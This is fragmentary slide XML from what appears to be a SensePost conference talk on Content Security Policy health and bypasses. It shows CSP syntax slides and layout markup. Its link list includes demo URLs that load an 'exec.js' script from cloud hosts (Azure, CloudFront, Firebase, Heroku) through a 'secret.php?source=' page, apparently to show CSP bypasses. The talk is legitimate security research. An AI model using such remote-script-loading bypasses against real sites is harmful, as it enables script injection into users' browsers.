              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3270475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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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992330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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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308460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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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1301011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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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344594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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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75630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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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1501247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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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2398141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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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408301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774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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1647745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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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3928614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9774E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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997DD6-2D6D-4610-BB7D-FF6A298FFDDC}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4151492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74E41-9F68-446A-A587-AFB685AF95E4}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24/08/2023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97DD6-2D6D-4610-BB7D-FF6A298FFDDC}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24577551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hemeOverride" Target="../theme/themeOverr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hemeOverride" Target="../theme/themeOverride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github.com/sensepost/dresscod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7.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http://s3-us-west-1.amazonaws.com/umbrella-static/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://majestic.com/reports/majestic-million"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video" Target="../media/media1.mkv"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media1.mkv"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><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twitter.com/felmolto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5.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4.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><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5.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><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7.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><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8.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><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hyperlink" Target="https://sensepost.com/blog/"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microsoft.com/office/2018/10/relationships/comments" Target="../comments/modernComment_123_93AF661C.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2" Type="http://schemas.microsoft.com/office/2018/10/relationships/comments" Target="../comments/modernComment_121_C4436FAA.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66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bit.ly/hotjar2" TargetMode="Externa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video" Target="../media/media2.mkv"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media2.mkv"/><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mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="Externa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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2018/10/relationships/comments" Target="../comments/modernComment_158_6D17BFAF.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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP"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58.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.keyfc.com/secret.php?source=https://nice-dune-08c8da410.3.azurestaticapps.net/exec.js" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudfront.keyfc.com/secret.php?source=https://d15xoolnwhr0d8.cloudfront.net/js/exec.js" TargetMode="Externa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60.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebase.keyfc.com/secret.php?source=https://demo-defcon.firebaseapp.com/exec.js" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://heroku.keyfc.com/secret.php?source=https://exfiltest-75310ac89c2a.herokuapp.com/exec.j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18/10/relationships/comments" Target="../comments/modernComment_182_66B4B1E8.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sensepost/dresscode" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/"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twitter.com/felmol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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8AACB73-F4D6-6310-CDD7-FCA0C74873FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5354747" y="2169336"/>
            <a:ext cx="6569397" cy="15519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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Big Data ✨ Approach to Understanding Content Security Policy Health Status (And 8 Bypasses ⏭️)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titre 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE3452D-4EB1-9F27-A192-91A5D86C9392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5354747" y="632654"/>
            <a:ext cx="5959797" cy="10781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8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dress Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A grey vest with pockets&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C647A1C-B3C8-452C-7E5C-4A985CEF6541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="510764" y="38251"/>
            <a:ext cx="4003752" cy="6763210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570856EF-10FB-4B15-06D2-FE220F8787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591904">
            <a:off x="8950057" y="3663403"/>
            <a:ext cx="2733239" cy="2727772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A black and orange sign with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7937663-3F6A-4BA9-7B19-0BFFD23D3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747" y="5402041"/>
            <a:ext cx="3156526" cy="920653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115735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withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100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BF2AAF-66ED-02CA-EA9C-5B76F1EE2B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="806"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-59089" y="1163781"/>
            <a:ext cx="12251089" cy="4545281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A collage of a person's face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90EBF83-AE13-1EC0-2919-28C5B3115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0" y="1148938"/>
            <a:ext cx="12251089" cy="4582226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103448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BD00FD-3D6A-7B82-9682-C92C22F33236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="294615" y="2000740"/>
            <a:ext cx="5291666" cy="3995206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A31C8FD-7049-B424-9797-E2363DBB3C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="16868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2000740"/>
            <a:ext cx="5801385" cy="3995206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B957CF-BF6D-5182-7E95-65CDB941981E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Feel old yet?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116566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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD9E2EEB-0D79-629B-111D-49A652759F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8651631" y="3209191"/>
            <a:ext cx="2461846" cy="439616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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61739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3073154"/>
            <a:ext cx="10515600" cy="711691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy: &lt;policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" i="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId2"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18127446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A6D951-54C9-5A9B-6555-AE4575C83798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946031" y="3651739"/>
            <a:ext cx="3261946" cy="378070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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E9100F0-8128-9D16-CC50-D688BAC82AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7807569" y="2983524"/>
            <a:ext cx="3261946" cy="378070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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D3B54892-5B54-D544-0381-3ED8A58AAC0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3877408" y="2963008"/>
            <a:ext cx="3261946" cy="378070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9791CBD-DE97-59F3-8162-3D1B8C4A09CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606668" y="2767280"/>
            <a:ext cx="10978663" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;policy&gt;: &lt;directive&gt;; &lt;directive&gt;; … ; &lt;directive&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId2"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39792384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par>
                                <p:cTn id="17" presetID="17"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ppt_w/2"/>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BF734-57F8-D2DE-028C-BA7E27C91D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010508" y="4123087"/>
            <a:ext cx="5046785" cy="369277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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F705C14E-0AC9-03E3-89B0-EFC01FF5F089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307015" y="3449347"/>
            <a:ext cx="5046785" cy="369277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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C497EC8-69B6-00C3-7AAA-5A827CA586E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767860" y="3449348"/>
            <a:ext cx="5046785" cy="369277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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B14A790-06B4-3C87-7BB3-64E4E4B8BEE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888523" y="2771724"/>
            <a:ext cx="4624754" cy="369278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF79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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFA3C6C-E23C-D19B-8E21-0219D1783DB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590023" y="2572158"/>
            <a:ext cx="11011952" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;directive&gt;: &lt;directive name&gt; &lt;directive value&gt; &lt;directive value&gt; […] &lt;directive value&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId2"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20336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ppt_w/2"/>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strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="19" presetID="17"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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="17"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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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8"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Does it Look?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
